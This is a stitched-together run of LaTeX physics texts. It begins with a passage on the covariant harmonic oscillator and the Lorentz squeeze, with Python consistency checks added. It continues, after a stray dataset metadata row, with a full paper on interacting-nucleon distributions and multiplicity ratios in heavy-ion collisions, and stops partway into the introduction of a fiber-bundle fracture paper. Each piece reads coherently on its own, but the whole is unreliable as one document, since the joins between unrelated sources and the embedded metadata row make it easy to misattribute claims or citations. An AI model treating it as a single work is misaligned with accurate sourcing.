other hand, it appears as a collection of partons when it moves with a
speed very close to that of light. This is called Feynman's parton picture
\cite{fey69}.
Let us consider a bound state of two particles. For convenience, we shall
call the bound state the hadron, and call its constituents quarks. Then
there is a Bohr-like radius measuring the space-like separation between the
quarks. There is also a time-like separation between the quarks, and this
variable becomes mixed with the longitudinal spatial separation as the
hadron moves with a relativistic speed. There are no quantum excitations
along the time-like direction. On the other hand, there is the time-energy
uncertainty relation which allows quantum transitions. It is possible to
accommodate these aspects within the framework of the present form of quantum
mechanics. The uncertainty relation between the time and energy variables is
a c-number relation, which does not allow excitations along the time-like
coordinate. We shall see that the covariant harmonic oscillator formalism
accommodates this narrow window in the present form of quantum mechanics.
Let us consider a hadron consisting of two quarks. If the space-time
positions of the two quarks are specified by $x_{a}$ and $x_{b}$, respectively,
the system can be described by the variables
\begin{equation}
X = (x_{a} + x_{b})/2 , \qquad x = (x_{a} - x_{b})/2\sqrt{2} .
\end{equation}
The four-vector $X$ specifies where the hadron is located in space and time,
while the variable $x$ measures the space-time separation between the
quarks. In the convention of Feynman {\it et al.}~\cite{fkr71}, the internal
motion of the quarks bound by a harmonic oscillator potential of unit
strength can be described by the Lorentz-invariant equation
\begin{equation}
{1\over 2}\left\{x^{2}_{\mu} - {\partial ^{2} \over \partial x_{\mu}^{2}}
\right\} \psi(x)= \lambda \psi(x) .
\end{equation}
We use here the space-favored metric: $x^{\mu} = (x, y, z, t)$.
It is possible to construct a representation of the Poincar\'e group
from the solutions of the above differential equation~\cite{knp86}.
If the hadron is at rest, the solution should take the form
\begin{equation}
\psi(x,y,z,t) = \phi(x,y,z) \left({1\over \pi}\right)^{1/4}
\exp \left(-t^{2}/2 \right) ,
\end{equation}
where $\phi(x,y,z)$ is the wave function for the three-dimensional
oscillator. If we use the spherical coordinate system, this wave
function will carry appropriate angular momentum quantum numbers.
Indeed, the above wave function constitutes a representation of Wigner's
$O(3)$-like little group for a massive particle~\cite{knp86}. There are
no time-like excitations, and this is consistent with our observation
of the real world. It was Dirac who noted first this space-time
asymmetry in quantum mechanics~\cite{dir27}. However, this asymmetry
is quite consistent with the $O(3)$ symmetry of the little group for
hadrons.
Since the three-dimensional oscillator differential equation is
separable in both the spherical and Cartesian coordinate systems, the
spherical form of $\phi(x,y,z)$ consists of Hermite polynomials of
$x, y$, and $z$. If the Lorentz boost is made along the $z$ direction,
the $x$ and $y$ coordinates are not affected, and can be dropped from
the wave function. The wave function of interest can be written as
\begin{equation}
\psi^{n}(z,t) = \left({1\over \pi}\right)^{1/4}\exp \left(-t^{2}/2 \right)
\phi_{n}(z) ,
\end{equation}
with
\begin{equation}\label{1dwf}
\phi_{n}(z) = \left({1 \over \pi n!2^{n}} \right)^{1/2} H_{n}(z)
\exp (-z^{2}/2) ,
\end{equation}
where $\phi_{n}(z)$ is the wave function of the $n$-th excited oscillator state.
The full wave function $\psi^{n}(z,t)$ is
\begin{equation}\label{wf}
\psi^{n}_{0}(z,t) = \left({1\over \pi n! 2^{n}}\right)^{1/2} H_{n}(z)
\exp \left\{-{1\over 2}\left(z^{2} + t^{2} \right) \right\} .
\end{equation}
The subscript 0 means that the wave function is for the hadron at rest. The
above expression is not Lorentz-invariant, and its localization undergoes a
Lorentz squeeze as the hadron moves along the $z$ direction~\cite{knp86}.
It is convenient to use the light-cone variables to describe Lorentz boosts.
The light-cone coordinate variables are
\begin{equation}
u = (z + t)/\sqrt{2} , \qquad v = (z - t)/\sqrt{2} .
\end{equation}
In terms of these variables, the Lorentz boost along the $z$
direction,
\begin{equation}
\pmatrix{z' \cr t'} = \pmatrix{\cosh \eta & \sinh \eta \cr \sinh \eta &
\cosh \eta}\pmatrix{z \cr t} ,
\end{equation}
takes the simple form
\begin{equation}\label{lorensq}
u' = e^{\eta} u , \qquad v' = e^{-\eta} v ,
\end{equation}
where $\eta$ is the boost parameter, $\eta = \tanh^{-1}\beta$, with $\beta$
the hadron velocity in units of $c$.
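As a quick consistency check (a numerical sketch, not part of the original derivation), one can verify Eq.(\ref{lorensq}) directly: boosting $(z,t)$ and transforming to light-cone variables reproduces the $e^{\pm\eta}$ rescaling, and the product $uv$ is invariant.

```python
import numpy as np

def boost(z, t, eta):
    # Lorentz boost along z (natural units, c = 1)
    return (np.cosh(eta) * z + np.sinh(eta) * t,
            np.sinh(eta) * z + np.cosh(eta) * t)

def light_cone(z, t):
    # light-cone variables u = (z + t)/sqrt(2), v = (z - t)/sqrt(2)
    return (z + t) / np.sqrt(2), (z - t) / np.sqrt(2)

z, t, eta = 0.3, -1.1, 0.7            # arbitrary test point and boost parameter
u, v = light_cone(z, t)
up, vp = light_cone(*boost(z, t, eta))

assert np.isclose(up, np.exp(eta) * u)    # u' = e^{eta} u
assert np.isclose(vp, np.exp(-eta) * v)   # v' = e^{-eta} v
assert np.isclose(up * vp, u * v)         # the product uv is preserved
```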
The wave function of Eq.(\ref{wf}) can be written as
\begin{equation}\label{10}
\psi^{n}_{0}(z,t)
= \left({1 \over \pi n!2^{n}} \right)^{1/2} H_{n}\left((u + v)/\sqrt{2}
\right) \exp \left\{-{1\over 2} (u^{2} + v^{2}) \right\} .
\end{equation}
If the system is boosted, the wave function becomes
\begin{equation}\label{11}
\psi^{n}_{\eta}(z,t) = \left({1 \over \pi n!2^{n}} \right)^{1/2}
H_{n} \left((e^{-\eta}u + e^{\eta}v)/\sqrt{2} \right)
\times \exp \left\{-{1\over 2}\left(e^{-2\eta}u^{2} +
e^{2\eta}v^{2}\right)\right\} .
\end{equation}
In both Eqs. (\ref{10}) and (\ref{11}), the localization property of the wave
function in the $u v$ plane is determined by the Gaussian factor, and it
is sufficient to study the ground state only for the essential feature of
the boundary condition. The wave functions in Eq.(\ref{10}) and
Eq.(\ref{11}) then respectively become
\begin{equation}\label{13}
\psi^{0}(z,t) = \left({1 \over \pi} \right)^{1/2}
\exp \left\{-{1\over 2} (u^{2} + v^{2}) \right\} .
\end{equation}
If the system is boosted, the wave function becomes
\begin{equation}\label{14}
\psi_{\eta}(z,t) = \left({1 \over \pi}\right)^{1/2}
\exp \left\{-{1\over 2}\left(e^{-2\eta}u^{2} +
e^{2\eta}v^{2}\right)\right\} .
\end{equation}
We note here that the transition from Eq.(\ref{13}) to Eq.(\ref{14}) is a
squeeze transformation. The wave function of Eq.(\ref{13}) is distributed
within a circular region in the $u v$ plane, and thus in the $z t$ plane.
On the other hand, the wave function of Eq.(\ref{14}) is distributed in an
elliptic region.
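This squeeze can be illustrated numerically (a sketch; the grid and the value of $\eta$ are arbitrary choices): the squeezed Gaussian of Eq.(\ref{14}) stays normalized, while its widths along the light-cone axes scale as $e^{\pm\eta}$, so the circular region deforms into an ellipse of constant area.

```python
import numpy as np

eta = 0.6
u = np.linspace(-12.0, 12.0, 1201)
du = u[1] - u[0]
U, V = np.meshgrid(u, u, indexing="ij")

# |psi_eta|^2 from Eq.(14): a squeezed ground-state Gaussian in the u-v plane
rho2 = (1.0 / np.pi) * np.exp(-(np.exp(-2 * eta) * U**2 + np.exp(2 * eta) * V**2))

norm = rho2.sum() * du * du             # Riemann-sum normalization integral
u2 = (U**2 * rho2).sum() * du * du      # <u^2>
v2 = (V**2 * rho2).sum() * du * du      # <v^2>

assert abs(norm - 1.0) < 1e-6                   # normalization is preserved
assert abs(u2 - np.exp(2 * eta) / 2) < 1e-3     # major axis grows like e^{eta}
assert abs(v2 - np.exp(-2 * eta) / 2) < 1e-3    # minor axis shrinks like e^{-eta}
```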
\section{Unitary Infinite-dimensional Representation}\label{infinite}
Let us go back to Eq.(\ref{10}) and Eq.(\ref{11}). We are now
interested in writing them in terms of the one-dimensional oscillator
wave functions given in Eq.(\ref{1dwf}). After some standard
calculations~\cite{knp86}, we can write the squeezed wave function as
\begin{equation}\label{power}
\psi^{n}_{\eta}(z,t) = \left({1\over\cosh\eta}\right)^{n+1}\sum^{}_{k}
\left((n + k)!\over n!k!\right)^{1/2}(\tanh\eta)^{k} \phi_{n+k}(z)
\phi_{n}(t) .
\end{equation}
If the parameter $\eta$ becomes zero, this form becomes the rest-frame
wave function of Eq.(\ref{10}).
It is sometimes more convenient to use the parameter $\beta$ defined
as
\begin{equation}
\beta = \tanh\eta .
\end{equation}
This parameter is the speed of the hadron divided by the speed of light.
In terms of this parameter, the expression of Eq.(\ref{power}) can be
written as
\begin{equation}\label{power2}
\psi^{n}_{\eta}(z,t) = \left(1 - \beta^{2}\right)^{(n+1)/2}\sum^{}_{k}
\left((n + k)!\over n!k!\right)^{1/2} \beta^{k} \phi_{n+k}(z)
\phi_{n}(t) .
\end{equation}
The normalization integral is
\begin{equation}\label{integ}
\int |\psi^{n}_{\eta}(z,t)|^{2} dz dt
= \left(1 - \beta^{2}\right)^{n+1} \sum^{}_{k}
\left((n + k)!\over n!k!\right) \beta^{2k} .
\end{equation}
The sum in the above expression is the same as the binomial expansion
of
$$
\left(1 - \beta^{2}\right)^{-(n+1)}.
$$
Thus, the right hand side of Eq.(\ref{integ}) is 1. The power series
expansion of Eq.(\ref{power}) reflects a well-known but hard-to-prove
mathematical theorem that nontrivial unitary representations of non-compact groups
are infinite-dimensional. The Lorentz group is a non-compact group.
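The unitarity statement can be checked by truncating the series (an illustrative sketch; the cutoff `kmax` is an arbitrary choice): the squared coefficients of Eq.(\ref{power2}) sum to one for any $n$ and any $|\beta| < 1$.

```python
from math import comb

def norm_sq(n, beta, kmax=2000):
    # truncated version of the sum in Eq.(integ); exact value is 1 as kmax -> infinity
    s = sum(comb(n + k, k) * beta**(2 * k) for k in range(kmax))
    return (1 - beta**2)**(n + 1) * s

for n in (0, 1, 5):
    for beta in (0.3, 0.9):
        assert abs(norm_sq(n, beta) - 1.0) < 1e-9
```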
If $n = 0$, the above form becomes simplified to
\begin{equation}\label{power0}
\psi_{\eta}(z,t) = \left(1 - \beta^{2}\right)^{1/2}\sum^{}_{k}
\beta^{k} \phi_{k}(z) \phi_{k}(t) .
\end{equation}
This is the power series expansion of Eq.(\ref{14}). This relatively
simple form is very useful in many other branches of physics.
It is well known that the mathematics of the Fock space in quantum
field theory is that of harmonic oscillators. Among them, the
coherent-state representation occupies a prominent place because
it is the basic language for laser optics. Recently, two-photon
coherent states have been observed, and their photon distribution is
exactly like that of the wave function given in Eq.(\ref{power}).
These coherent states are commonly called squeezed states. It is
very difficult to see why the word ``squeeze'' has to be associated
with the power series expansion given in Eq.(\ref{power}) or
Eq.(\ref{power2}). It is however quite clear from the expression of
Eq.(\ref{14}) that the Gaussian distribution is squeezed. Thus, the
above representation tells us how squeezed states are squeezed.
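For $n = 0$ the connection to photon statistics can be made explicit (a sketch; reading $k$ as a photon-pair number is the standard squeezed-state interpretation, assumed here for illustration): the squared coefficients of Eq.(\ref{power0}), $P(k) = (1-\beta^{2})\beta^{2k}$, form a geometric, thermal-like distribution with mean $\sinh^{2}\eta$.

```python
import numpy as np

eta = 0.8
beta = np.tanh(eta)

k = np.arange(2000)
P = (1 - beta**2) * beta**(2 * k)     # squared coefficients of Eq.(power0)

assert np.isclose(P.sum(), 1.0)                      # distribution is normalized
assert np.isclose((k * P).sum(), np.sinh(eta)**2)    # mean pair number = sinh^2(eta)
```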
Next, let us briefly discuss the role of this infinite dimensional
representation in understanding the density matrix. For simplicity,
we shall work with the squeezed ground-state wave function. From the
wave function of Eq.(\ref{power0}), we can construct the pure-state
density matrix
\begin{equation}\label{pure}
\rho_{\eta}(z,t;z',t') = \psi_{\eta}(z,t)\psi_{\eta}(z',t') ,
\end{equation}
which satisfies the condition $\rho^{2} = \rho $:
\begin{equation}
\rho_{\eta}(z,t;z',t') = \int \rho_{\eta}(z,t;z'',t'')
\rho_{\eta}(z'',t'';z',t') dz'' dt'' .
\end{equation}
However, there are at present no measurement theories which accommodate
the time-separation variable t. Thus, we can take the trace of the
$\rho$ matrix with respect to the $t$ variable. Then the resulting
density matrix is
\begin{equation}\label{densi}
\rho_{\eta}(z,z') = \int \psi_{\eta}(z,t)
\left\{\psi_{\eta}(z',t)\right\}^{*} dt
= \left(1 - \beta^{2}\right)\sum^{}_{k}
\beta^{2k}\phi_{k}(z)\phi^{*}_{k}(z') .
\end{equation}
It is of course possible to compute the above integral using the
analytical expression given in Eq.(\ref{14}). The result is
\begin{equation}
\rho_{\eta}(z,z') = \left({1\over \pi \cosh 2\eta} \right)^{1/2}
\exp\left\{-{1\over 4}[(z + z')^{2}/\cosh 2\eta
+ (z - z')^{2}\cosh 2\eta] \right\} .
\end{equation}
This form of the density matrix satisfies the trace condition
\begin{equation}
\int \rho(z,z) dz = 1 .
\end{equation}
The trace of this density matrix is one, but the trace of $\rho^{2}$ is
less than one, as
\begin{equation}
Tr\left(\rho^{2}\right) = \int \rho_{\eta}(z,z')
\rho_{\eta}(z',z) dz'dz
= \left(1 - \beta^{2}\right)^{2} \sum^{}_{k} \beta^{4k} ,
\end{equation}
which sums to $\left(1 - \beta^{2}\right)/\left(1 + \beta^{2}\right)$ and is
indeed less than one. This is
due to the fact that we do not know how to deal with the time-like
separation in the present formulation of quantum mechanics. Our
knowledge is less than complete.
The standard way to measure this ignorance is to calculate the
entropy defined as~\cite{neu32,wiya63}
\begin{equation}
S = - Tr\left(\rho\ln(\rho)\right) .
\end{equation}
If we pretend to know the distribution along the time-like
direction and use the pure-state density matrix given in Eq.(\ref{pure}),
then the entropy is zero. However, if we do not know how to deal with
the distribution
along $t$, then we should use the density matrix of Eq.(\ref{densi}) to
calculate the entropy, and the result is~\cite{kiwi90pl}
\begin{equation}
S = 2 [(\cosh\eta)^{2}\ln (\cosh\eta) - (\sinh\eta)^{2}\ln(\sinh\eta)] .
\end{equation}
In terms of the velocity parameter, this expression can be written as
\begin{equation}
S = {1\over 1 - \beta^{2}}\ln{1\over 1 - \beta^{2}} -
{\beta^{2} \over 1 - \beta^{2}}\ln{\beta^{2} \over 1 - \beta^{2}} .
\end{equation}
From this we can derive the hadronic temperature~\cite{hkn90pl}.
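The entropy can be cross-checked numerically (a sketch; the truncation at 600 eigenvalues is an arbitrary cutoff, with a neglected tail of order $10^{-170}$): summing $-\lambda_{k}\ln\lambda_{k}$ over the eigenvalues $\lambda_{k} = (1-\beta^{2})\beta^{2k}$ of the density matrix in Eq.(\ref{densi}) reproduces the closed form in $\eta$, and the same eigenvalues give $Tr(\rho^{2}) = (1-\beta^{2})/(1+\beta^{2})$.

```python
import numpy as np

eta = 0.9
beta = np.tanh(eta)

# eigenvalues of the reduced density matrix of Eq.(densi)
k = np.arange(600)
lam = (1 - beta**2) * beta**(2 * k)

S_sum = -(lam * np.log(lam)).sum()
S_closed = 2 * (np.cosh(eta)**2 * np.log(np.cosh(eta))
                - np.sinh(eta)**2 * np.log(np.sinh(eta)))
purity = (lam**2).sum()

assert np.isclose(S_sum, S_closed)                         # entropy formula checks
assert np.isclose(purity, (1 - beta**2) / (1 + beta**2))   # Tr(rho^2) < 1
```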
In this report, the time-separation variable $t$ played the role of
an unmeasurable variable. The use of an unmeasurable variable as
a ``shadow'' coordinate is not new in physics and is of current
interest~\cite{ume82}. Feynman's book on statistical mechanics
contains the following paragraph~\cite{fey72}.
{\it When we solve a quantum-mechanical problem, what we really do
is divide the universe into two parts - the system in which we are
interested and the rest of the universe. We then usually act as if
the system in which we are interested comprised the entire universe.
To motivate the use of density matrices, let us see what happens
when we include the part of the universe outside the system.}
In the present paper, we have identified Feynman's rest of the
universe as the time-separation coordinate in a relativistic two-body
problem. Our ignorance about this coordinate leads to a density matrix
for a non-pure state, and consequently to an increase of entropy.
| 2024-02-18T23:40:12.861Z | 1998-11-16T17:30:39.000Z | algebraic_stack_train_0000 | 1,672 | 3,660 |
|
\section{Introduction}
The correlation of the mean multiplicity with some trigger is an
important problem of high energy heavy ion physics. For example,
$J/\psi$ suppression can be explained at least partially
\cite{CKKG,ACF} by $J/\psi$
interactions with co-moving hadrons, and for numerical
calculations one needs the multiplicity of comovers specifically
in events with $J/\psi$ production.
In the present paper we give some results for the dependences of
the number of interacting nucleons and the multiplicity of produced
secondaries on the impact parameter. These results are based practically
only on geometry, and do not depend on the model of interaction. In the
case of minimum bias interactions the dispersion of the distribution on
the number of interacting nucleons (which is similar to the
distributions on the transverse energy, multiplicity of secondaries,
etc.) is very large. This allows, in principle, a significant
dependence of some characteristic of the interaction, say the mean
multiplicity of the secondaries, on the trigger used. On the other hand,
in the case of central collisions the discussed dispersion is small,
which should result in a weak dependence on any trigger.
We consider the high energy nucleus-nucleus collision as a superposition
of independent nucleon-nucleon interactions. Our results can thus also
be considered as a test in the search for quark-gluon plasma formation.
In the case of any collective interactions, including the case of
quark-gluon plasma formation, we see no reason for the discussed ratios
to hold. We present an estimate of the possible violation, based on
quark-gluon string fusion calculations.
\section{Distributions on the number of interacting nucleons
for different impact parameters}
Let us consider the events with secondary hadron production in
nuclei A and B minimum bias collisions. In this case the average number
of inelastically interacting nucleons of a nucleus A is equal \cite{BBC}
to
\begin{equation}
<N_A>_{m.b.} = \frac{A \sigma^{prod}_{NB}}{\sigma^{prod}_{AB}} \;.
\end{equation}
If both nuclei, A and B are heavy enough, the production cross sections
of nucleon-nucleus and nucleus-nucleus collisions can be written as
\begin{equation}
\sigma^{prod}_{NB} = \pi R_B^2 \;,
\end{equation}
and
\begin{equation}
\sigma^{prod}_{AB} = \pi (R_A + R_B)^2 \;.
\end{equation}
It is evident that in the case of equal nuclei, A = B,
\begin{equation}
<N_A>_{m.b.} = A/4 \;.
\end{equation}
So in the case of minimum bias events the average number of
interacting nucleons should be four times smaller than in the
case of central collisions, where $<N_A>_c \approx A$.
For the calculation of the distribution over the number of
inelastically interacting nucleons of the nucleus A we will use the
rigid target approximation \cite{Alk,VT,PR}, which gives the
probability of $N_A$ nucleons interaction as \cite{GCSh,BSh}
\begin{equation}
V(N_A) = \frac{1}{\sigma^{prod}_{AB}} \frac{A!}{(A-N_A)! N_A!}
\int d^2 b [I(b)]^{A-N_A} [1-I(b)]^{N_A} \;,
\end{equation}
where
\begin{equation}
I(b) = \frac{1}{A} \int d^2 b_1 T_A(b_1-b)
\exp \left[- \sigma^{inel}_{NN}T_B(b_1)\right] \;,
\end{equation}
\begin{equation}
T_A(b) = A \int dz \rho (b,z) \;.
\end{equation}
Eq. (5) is written for minimum bias events. In the case of events
for some interval of impact parameter $b$ values, the integration
in Eq. (5) should be fulfilled by this interval,
$b_{min} < b < b_{max}$. In particular, in the case of central
collisions the integration should be performed with the condition
$b \leq b_0$, and $b_0 \ll R_A$.
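As a toy illustration of Eqs. (5)-(7) at fixed impact parameter (a sketch only: the uniform-sphere profile and the values $A = 50$, $\sigma^{inel}_{NN} = 3$ fm$^{2}$ and $b = 4$ fm are assumptions for the sketch, not the paper's inputs), note that the integrand of Eq. (5) at given $b$ is a binomial distribution in $N_{A}$, hence normalized with mean $A[1 - I(b)]$.

```python
import numpy as np
from math import comb

A = 50                         # assumed mass number for the toy example
R = 1.2 * A**(1/3)             # fm, uniform-sphere radius (assumption)
sigma = 3.0                    # fm^2, assumed sigma_NN^inel

def T(b):
    # thickness function of a uniform sphere, Eq.(7)
    b = np.asarray(b, dtype=float)
    rho0 = A / (4 / 3 * np.pi * R**3)
    return np.where(b < R, 2 * rho0 * np.sqrt(np.clip(R**2 - b**2, 0, None)), 0.0)

def I(b, ngrid=400):
    # Eq.(6): survival probability of one projectile nucleon at impact parameter b
    x = np.linspace(-2 * R, 2 * R, ngrid)
    X, Y = np.meshgrid(x, x, indexing="ij")
    dA = (x[1] - x[0])**2
    bt = np.sqrt(X**2 + Y**2)            # |b1|
    ba = np.sqrt((X - b)**2 + Y**2)      # |b1 - b|
    return (T(ba) * np.exp(-sigma * T(bt))).sum() * dA / A

b = 4.0                                  # fm, a fixed impact parameter
p_surv = I(b)
NA = np.arange(A + 1)
V = np.array([comb(A, n) * p_surv**(A - n) * (1 - p_surv)**n for n in NA])

assert 0.0 < p_surv < 1.0
assert np.isclose(V.sum(), 1.0)                       # binomial normalization
assert np.isclose((NA * V).sum(), A * (1 - p_surv))   # <N_in> = A[1 - I(b)]
```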
The calculated results for averaged values of the number of inelastic
interacting nucleons of the projectile nucleus, $<N_{in}>$ are presented
in Fig. 1, as the functions of impact parameter $b$ for the cases of
$Pb-Pb$ collisions at three different energies (we define $\sqrt{s}$ =
$\sqrt{s_{NN}}$ as the c.m. energy for one nucleon-nucleon pair), and for
$S-U$ collisions at $\sqrt{s_{NN}}$ = 20 GeV. One can see a very
weak dependence of these distributions on the initial energy,
which appears in our approach only through the energy dependence of
$\sigma_{NN}^{inel}$.
In the case of the collisions of equal heavy ions ($Pb-Pb$ in our case)
at zero impact parameter, about 6\% of nucleons from every nucleus do
not interact inelastically at energy $\sqrt{s_{NN}}$ = 18 GeV. More
precisely, we obtain on average 11.8 non-interacting nucleons at this
energy, which is in agreement with the value $13 \pm 2$ nucleons
\cite{Alb}, based on the VENUS 4.12 \cite{Kla} model prediction. The
number of non-interacting nucleons decreases to the value about 3\% at
$\sqrt{s_{NN}}$ = 5.5 TeV. This is connected with the fact that the
nucleons at the periphery of one nucleus, which overlap with the
low-density region of nuclear matter at the periphery of the other
nucleus, have a large probability of penetrating without inelastic
interaction. It is clear that this probability decreases as
$\sigma_{NN}^{inel}$ increases, which results in the presented energy dependence.
The value of $<\!N_{in}\!>$ decreases with increasing impact
parameter because even at small $b \neq 0$ some regions of colliding
ions are not overlapping.
In the case of different ion collisions, say $S-U$, at small impact
parameters all nucleons of the light nucleus pass through regions of
relatively high nuclear matter density of the heavy nucleus, so
practically all these nucleons interact inelastically. For the case of
$S-U$ interactions at $\sqrt{s_{NN}}$ = 20 GeV it is valid for
$b < 2\div 3$ fm.
It is interesting to consider the distributions on the number of
inelastically interacting nucleons at different impact parameters.
The calculated probabili\-ties to find the given numbers of
inelastically interacting nucleons for the case of minimum bias $Pb-Pb$
events are presented in Fig. 2a. The average value, $<N_{in}>$ = 50.4
is in reasonable agreement with Eq. (4). The disagreement of the order
of 3\% can be connected with different values of effective nuclear radii
in Eqs. (2) and (3). The dispersion of the distribution on $N_{in}$ is
very large.
The results of the same calculations for different regions of impact
parame\-ters are presented in Fig. 2b, where we compare the cases of the
central ($b < 1$ fm), peripheral (12 fm $< b <$ 13 fm) and intermediate
(6 fm $< b <$ 7 fm) collisions. One can see that the dispersions of all
these distributions are many times smaller in comparison with the
minimum bias case, Fig. 2a.
In the cases of the central and peripheral interactions, the
distributions over $N_{in}$ are significantly more narrow than in the
intermediate case. The reason is that in a central collision
the number of nucleons at the periphery of one nucleus, which have
comparable probabilities to interact or not, is rather small.
In a very peripheral collision the total number of nucleons
which can interact is small. However, in the intermediate case a
comparatively large number of nucleons of one nucleus pass through the
peripheral region of the other nucleus with small nuclear matter density,
and each of these nucleons may or may not interact.
\section{Ratio of secondary hadron multiplicities in the central
and minimum bias heavy ion collisions}
Let us consider now the multiplicity of the produced secondaries in the
central region. First of all, it should be proportional to the number of
interacting nucleons of the projectile nucleus. It also depends on
the average number, $<\! \nu_{NB} \!>$, of inelastic interactions of
every projectile nucleon with the target nucleus. At asymptotically
high energies the mean multiplicity of secondaries produced in
nucleon-nucleus collision should be proportional to $<\! \nu\! >$
\cite{Sh1,CSTT}. As was shown in \cite{Sh}, the average number of
interactions in the case of central nucleon-nucleus collisions,
$<\! \nu \!>_c$, is approximately 1.5 times larger than in the case of
minimum bias nucleon-nucleus collisions, $<\! \nu \!>_{m.b.}$. It means
that the mean multiplicity of any secondaries in the central heavy ion
collisions (with A = B), $<\! n\!>_c$ should be approximately 6 times
larger than in the case of minimum bias collisions of the same nuclei,
$<\! n \!>_{m.b.}$, $<\! n \!>_c \approx 6 <\! n \!>_{m.b.}$. Of course,
this estimate is valid only for secondaries in the central region of
inclusive spectra.
There exist several corrections to the obtained result. At existing
fixed target energies the multiplicity of secondaries is proportional
not to $<\! \nu \!>$, but to $\frac{1 + <\nu>}{2}$ \cite{CSTT,CCHT}.
For heavy nuclei the values of $<\! \nu \!>_{m.b.}$ are about
$3 \div 4$. It means that the $<\nu_{NB}>_c$ to $<\nu_{NB}>_{m.b.}$
ratio of 1.5 results in an enhancement factor of about 1.4 for the
multiplicity of secondaries. A more important correction comes from the
fact that in a central collision of two nuclei with the same
atomic weights, only a part of the projectile nucleons can interact with the
central region of the target nucleus. This decreases the discussed
enhancement factor to, say, 1.2. As presented in the previous
Sect., even in central collisions (with zero impact parameter) of equal
heavy nuclei, several percents of projectile nucleons do not interact
with the target because they are moving through the diffusive region of
the target nucleus with very small density of nuclear matter.
As a result, we arrive at the estimate
\begin{equation}
<\! n \!>_c \sim 4.5 <\! n \!>_{m.b.} \;.
\end {equation}
In the case of quark-gluon plasma formation or some other collective
effects we see no reason for such predictions to hold. For example,
the calculation of $<n>_c$ and $<n>_{m.b.}$ accounting for the string
fusion effect \cite{USC} violates Eq. (8) at the level of 40\% for the
case of $Au-Au$ collisions at RHIC energies.
Moreover, in the conventional approach considered here, we obtain the
prediction of Eq. (8) for any sort of secondaries including pions,
kaons, $J/\psi$, Drell-Yan pairs, direct photons, etc. Let us imagine
that the quark-gluon plasma formation is possible only at comparatively
small impact parameters (i.e. in the central interactions). In this case
Eq. (8) can be strongly violated, say, for direct photons and, possibly,
for light mass Drell-Yan pairs, due to the additional contribution to
their multiplicity in the central events via thermal mechanism. At the
same time, Eq. (8) can remain valid, say, for pions, if most of
them are produced at the late stage of the process, after decay of the
plasma state. So the violation of Eq. (8) for the particles which can
be emitted from the plasma state should be considered as a signal for
quark-gluon plasma formation. Of course, the effects of final state
interactions, etc., should be accounted for in such a test.
It was shown in Ref. \cite{DPS} that the main contribution to the
dispersion of multiplicity distribution in the case of heavy ion
collisions comes from the dispersion in the number of nucleon-nucleon
interactions. The last number is in strong correlation
with the value of impact parameter.
For the normalized dispersion $D/<\! n \!>$, where
$D^2 = <\! n^2 \!> - <\! n \!>^2$
we have \cite{DPS}
\begin{equation}
\frac{D^2}{<\! n \!>^2} =
\frac{<\nu_{AB}^2> - <\nu_{AB}>^2}{<\nu_{AB}>^2}
+ \frac{1}{<\nu_{AB}>} \frac{d^2}{\overline{n}^2} \;,
\end {equation}
where $<\nu_{AB}> = <\! N_A \!> \cdot <\nu_{NB}>$ is the average number
of nucleon-nucleon interactions in nucleus-nucleus collision,
$\overline{n}$ and $d$ are the average multiplicity and the dispersion
in one nucleon-nucleon collision.
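Eq. (9) is the standard variance decomposition for a random sum of independent nucleon-nucleon contributions; a Monte Carlo sketch confirms it (the shifted-Poisson distribution for $\nu_{AB}$ and the Poisson per-collision multiplicity below are toy assumptions, not the paper's model):

```python
import numpy as np

rng = np.random.default_rng(1)
M = 200_000                                 # number of simulated events

# toy model: nu NN collisions per event, Poisson multiplicity per collision
nu = 1 + rng.poisson(200, size=M)
nbar = 3.0
n = rng.poisson(nbar * nu)                  # sum of nu Poisson(nbar) variables

lhs = n.var() / n.mean()**2                 # D^2 / <n>^2
d2 = nbar                                   # Poisson dispersion: d^2 = nbar
rhs = nu.var() / nu.mean()**2 + d2 / (nu.mean() * nbar**2)

assert abs(lhs - rhs) < 0.05 * rhs          # Eq.(9) holds within MC accuracy
```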
In the case of heavy ion collisions $<\nu_{AB}> \sim 10^2 - 10^3$,
so the second term in the right hand side of Eq. (9) becomes negligible
\cite{DPS}, and the first term, which is the relative dispersion in the
number of nucleon-nucleon interactions, dominates. In the case of
minimum bias A-B interaction the last dispersion is comparatively large
due to large dispersion in the distribution on $N_A$, see Fig. 2a. So in
the case of some trigger (say, $J/\psi$ production) without fixing of
the impact parameter, the multiplicity of secondaries can change
significantly in comparison with its average value. In the case of some
narrow region of impact parameters the dispersion in the distribution on
$N_A$ is many times smaller, as one can see in Fig. 2b, especially in
the case of central collisions. The dispersion in the number of
inelastic interactions of one projectile nucleon with the target
nucleus, $\nu_{NB}$, should be the same or slightly smaller in
comparison with the minimum bias case. So the dispersion in the
multiplicity of secondaries cannot be large. It means that no trigger
can change significantly the average multiplicity of secondaries in
central heavy ion collisions, even if this trigger strongly
influences the multiplicity in the nucleon-nucleon interaction.
\section{Conclusions}
We calculated the distributions on the number of interacting nucleons
in heavy ion collisions as the functions of impact parameters. The
dispersions of these distributions are very small for the central and
very peripheral interactions and significantly larger for
intermediate values of impact parame\-ters.
We estimated also the ratio of mean multiplicities of secondaries in
minimum bias and central collisions, which can be used for search of
quark-gluon plasma formation. We have shown that in the case of
central collisions no trigger can change the average multiplicity
significantly (say, by more than 10-15\%). This fact can be used
experimentally to distinguish collective effects on $J/\psi$ production,
like quark-gluon plasma, from more conventional mechanisms.
In conclusion we express our gratitude to A.Capella and A.Kaidalov
for useful discussions. We thank the Direcci\'on General de
Pol\'{\i}tica Cient\'{\i}fica and the CICYT of Spain for financial
support. The paper was also supported in part by grant NATO OUTR.LG
971390.
\newpage
\begin{center}
{\bf Figure captions}\\
\end{center}
Fig. 1. Average numbers of inelastically interacting nucleons in
$Pb-Pb$ and $S-U$ collisions at different energies as the functions of
impact parameter.
Fig. 2. Distributions of the numbers of inelastically interacting
nucleons in $Pb-Pb$ collisions at $\sqrt{s_{NN}} = 18$ GeV for minimum
bias (a) interactions and for different regions of impact parameter (b).
\newpage
\section{Introduction}
There are few mechanical problems more complex and difficult to cast
into a definite physical and theoretical treatment than the range of
phenomena associated with fracture. Furthermore, there are few
problems with a wider field of application: material science,
engineering, rock mechanics, seismology and earthquake occurrence. Our
understanding of fracture processes in heterogeneous materials has
recently improved with the development of simple deterministic and
stochastic algorithms to simulate the process of quasistatic loading
and static fatigue \cite{herrman90}. The load-transfer models used
here are called fiber-bundle models, because they arose in close
connection with the strength of bundles of textile fibers. Since
Daniels' and Coleman's \cite{daniels45} seminal works, there has been
a long tradition in the use of these models to analyze failure of
heterogeneous materials \cite{harlow78}. Fiber-bundle models differ by
how the load carried by a failed element is distributed among the
